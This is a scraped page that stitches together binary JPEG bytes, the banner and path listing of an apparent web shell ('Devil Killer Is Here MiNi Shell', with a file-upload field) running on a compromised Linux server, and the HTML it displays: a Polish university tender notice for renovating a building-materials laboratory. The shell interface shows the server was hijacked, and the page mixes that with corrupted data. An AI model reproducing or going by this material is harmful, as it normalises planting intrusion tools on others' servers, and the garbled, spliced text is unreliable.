JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231113/0049102401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja Laboratorium Materiałów i Konstrukcji Budowlanych KBB w budynku B7 Wydziału Budownictwa, Architektury i Inżynierii Środowiska Politechniki Łódzkiej – w systemie „zaprojektuj i wybuduj” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLITECHNIKA ŁÓDZKA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Budownictwa, Architektury i Inżynierii Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Politechniki 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">93-590</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 631 29 30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">beata.wojciechowska-cholewa@p.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.p.lodz.pl/ Platforma zakupowa Zamawiającego - https://plodz.ezamawiajacy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja Laboratorium Materiałów i Konstrukcji Budowlanych KBB w budynku B7 Wydziału Budownictwa, Architektury i Inżynierii Środowiska Politechniki Łódzkiej – w systemie „zaprojektuj i wybuduj” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f451ebba-822e-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00491024</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00047365/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Inwestycja budowlana pod nazwą &#34;Modernizacja Laboratorium Materiałów i Konstrukcji Budowlanych&#34; obejmujaca min. projekt i wykonanie posadzki, scian i sufitu.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://plodz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W przedmiotowym postępowaniu komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu następujących<br/>środków komunikacji elektronicznej:<br/>a) Platformy do obsługi postępowań przetargowych, dostępnej pod adresem: https://plodz.ezamawiajacy.pl w zakładce<br/>„Korespondencja”;<br/>b) E-mailem na adres: beata.wojciechowska-cholewa@p.lodz.pl – NIE DOTYCZY ZŁOŻENIA OFERTY<br/>c) W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania –<br/>W6.262.7.ZP.2023<br/>2. Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptuje regulamin korzystania z<br/>Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wszelkie oświadczenia, dokumenty,<br/>wnioski, zawiadomienie oraz informacje przekazywane są w formie elektronicznej za pośrednictwem Platformy zakupowej dostępnej<br/>pod adresem: https://plodz.ezamawiajcy.pl w zakładce „Korespondencja”. Za datę przekazania oświadczeń, dokumentów,<br/>wniosków, zawiadomień oraz informacji przyjmuje się datę ich wysłania/złożenia za pośrednictwem zakładki „Korespondencja”.<br/>2.Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: beata.wojciechowska-cholewa@p.lodz.pl. Nie<br/>dotyczy to składania ofert. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za<br/>dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu<br/>oświadczeń, dokumentów, wniosków, zawiadomień oraz informacji przekazywanych na w/w adres e-mail Zamawiającego przyjmuje<br/>się datę dostarczenia na adres e-mail Zamawiającego wskazany powyżej.<br/>3. Datą złożenia dokumentu, oświadczenia lub innego rodzaju informacji stanowiących przedmiot korespondencji (w tym oferty,<br/>wyjaśnień, wezwania, uzupełnienia etc.) jest data ich wysłania za pośrednictwem zakładki „Korespondencja”. System powiadamia<br/>Wykonawcę na adres e-mail podany przez Wykonawcę przy zakładaniu konta na Platformie, o korespondencji wysłanej przez<br/>Zamawiającego do Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź,<br/>2. inspektor ochrony danych osobowych w Politechnice Łódzkiej kontakt: rbi@adm.p.lodz.pl<br/>telefon: 42 631 20 39 (Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub<br/>podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych),<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego,<br/>4. dane osobowe przetwarzane będą przez spółkę Otwarty Rynek Elektroniczny S.A. z siedzibą w Warszawie<br/>(02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez<br/>Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS:<br/>0000041441, REGON: 017282436, NIP:526-25-35-153, jako właściciel Platformy Zakupowej, na której Politechnika Łódzka prowadzi<br/>postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://plodz.ezamawiajacy.pl<br/>5. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp”,<br/>6. Pani/Pana dane osobowe będą przechowywane przez okres 10 lat zgodnie z Jednolitym Rzeczowym Wykazem Akt Politechniki<br/>Łódzkiej,<br/>7. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiemustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencjeniepodania określonych danych wynikają z ustawy Pzp,już wskazanymi informacjami, jak również w celu właściwego<br/>zabezpieczenia i ochrony danych tych osób, z których Wykonawca<br/>będzie korzystał, przekazanych przez Wykonawcę w ofercie, celem uzyskania zamówienia publicznego, Zamawiający zwraca się z<br/>prośbą o złożenie przez Wykonawcę wraz z oferta oświadczenia dotyczącego pozyskania przez Wykonawcę danych osobowych od<br/>osób trzecich dla konkretnego postępowania o udzielenie zamówienia publicznego. Oświadczenie zawarte jest w Formularzu oferty–<br/>Załącznik nr 1 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>9. posiada Pani/Pan:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (W przypadku gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu),<br/> na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych; (Wyjaśnienie: skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników),<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; (Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego oraz<br/>zgodnie z art. 8a ust. 4 ustawy Pzp wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu),<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>10. nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>11. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych<br/>na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.<br/>12. Dla uzyskania przez Zamawiającego potwierdzenia, że osoby których dane osobowe są przekazywane Zamawiającemu,<br/>dysponują już wskazanymi informacjami, jak również w celu właściwego zabezpieczenia i ochrony danych tych osób, z których<br/>Wykonawca będzie korzystał, przekazanych przez Wykonawcę w ofercie, celem uzyskania zamówienia publicznego, Zamawiający<br/>zwraca się z prośbą o złożenie przez Wykonawcę wraz z oferta oświadczenia dotyczącego pozyskania przez Wykonawcę danych<br/>osobowych od osób trzecich dla konkretnego postępowania o udzielenie zamówienia publicznego. Oświadczenie zawarte jest w<br/>Formularzu oferty – Załącznik nr 1 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">W6.262.7.ZP.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 473512,20 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest modernizacja Laboratorium Materiałów i Konstrukcji Budowlanych Katedry Budownictwa Betonowego w budynku B7 Wydziału Budownictwa, Architektury i Inżynierii Środowiska Politechniki Łódzkiej – w systemie „zaprojektuj i wybuduj”. <br/>2.	Modernizacja (remont) Laboratorium obejmuje sporządzenie dokumentacji projektowej wraz z uzyskaniem niezbędnych uzgodnień oraz wykonanie robót budowlanych polegających na całkowitej wymianie podłóg oraz naprawie i malowaniu okładzin ściennych i sufitów w hali Laboratorium. <br/>3.	Przedmiot zamówienia został podzielony i obejmuje następujące zadania:<br/><br/>Zadanie nr 1 – sporządzenie dokumentacji projektowej wraz z modernizacją posadzki w hali Laboratorium Katedry Budownictwa Betonowego WBAiIŚ PŁ;<br/>Na przedmiot zamówienia składa się:<br/>•	Sporządzenie dokumentacji projektowej posadzki.<br/>•	Wymiana całej konstrukcji podłogi. Odtworzenie konstrukcji podłogi oraz wykonanie nowej posadzki żywicznej (PU) z piaskiem kwarcowym o grubości 2-4 mm: powierzchnia 320 m2.<br/>•	Rekonstrukcja posadzki poprzez usuniecie istniejącej posadzki (lastryko) oraz wykonanie nowej posadzki żywicznej (PU) z piaskiem kwarcowym o grubości powyżej 2-4 mm: powierzchnia 150 m2.<br/><br/>Łącznie prace posadzkarskie obejmują powierzchnię 470 m2. <br/><br/>Zadanie nr 2 – sporządzenie dokumentacji projektowej wraz z modernizacją ścian i sufitu w hali Laboratorium Katedry Budownictwa Betonowego WBAiIŚ PŁ.<br/>Na przedmiot zamówienia składa się:<br/>•	Sporządzenie dokumentacji projektowej ścian i sufitu.<br/>•	Malowanie powierzchni sufitów: 910 m2.<br/>•	Malowanie powierzchni ścian, słupów 960 m2.<br/><br/>4.	Zamawiający nie dopuszcza możliwości złożenia przez Wykonawcę oferty na dowolnie wybrane zadanie. <br/>5.	Zamawiający wymaga złożenia oferty łącznie na Zadanie nr 1 i Zadanie nr 2 tj. wszystkie zadania składające się na przedmiot zamówienia, zawarte w Formularzu ofertowym, stanowiącym Załącznik nr 1 do SPECYFIKACJI WARUNKÓW ZAMÓWIENIA (SWZ).<br/>6.	Oferta musi obejmować co najmniej te elementy przedmiotu zamówienia, które składają się na każde z zadań. <br/>7.	Nieuwzględnienie w ofercie jakiejkolwiek pozycji w ramach zadania, którego oferta dotyczy, spowoduje jej odrzucenie z uwagi na sprzeczność z niniejszą SWZ na podstawie art. 226 ust. 1 punkt 5) ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45432120-1 - Instalowanie nawierzchni podłogowych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45442190-5 - Usuwanie warstwy malarskiej</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z kryteriami określonymi w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonanie posadzki przemysłowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi na wykonane pozostałe roboty budolwane w ramach modernizacji hali Laboratorium</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zgodnie z art. 57 Ustawy Pzp o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. spełniają warunki udziału w postępowaniu dotyczące Zdolności technicznej lub zawodowej – art. 112 ust.2 pkt. 4 ustawy<br/>Pzp .<br/>Warunek zostanie uznany za spełniony, jeżeli Zamawiający uzna, iż Wykonawca posiada zdolności techniczne i zawodowe,<br/>jeżeli wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie – wykonał co<br/>najmniej 1 robotę budowlaną, której przedmiotem było wykonanie co najmniej 300 m2 posadzki przemysłowej i udokumentuje, że robota została wykonana należycie oraz że została wykonana zgodnie z przepisami prawa budowlanego<br/>i prawidłowo ukończona. - dotyczy Zadania nr 1 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy w<br/>trybie art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu z postępowania w zakresie wskazanym w SWZ, stanowiące Załącznik<br/>nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">I. Ośw.<br/>Wykonawcy o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w SWZ, zgodnie z art. 125 ust.<br/>ustawy Pzp, którego wzór stanowi Zał. nr 3 do SWZ.<br/>II. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w pkt. I, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, którego wzór stanowi Zał. nr4 do<br/>SWZ.<br/>Wykaz robót budowl. wykonanych nie wcześniej niż w okr.ostatnich 5 lat, a jeżeli okres prowadz.działaln. jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykon. oraz podm., na rzecz których rob. te zostały wykon. należ.<br/>,oraz załącz dowod. 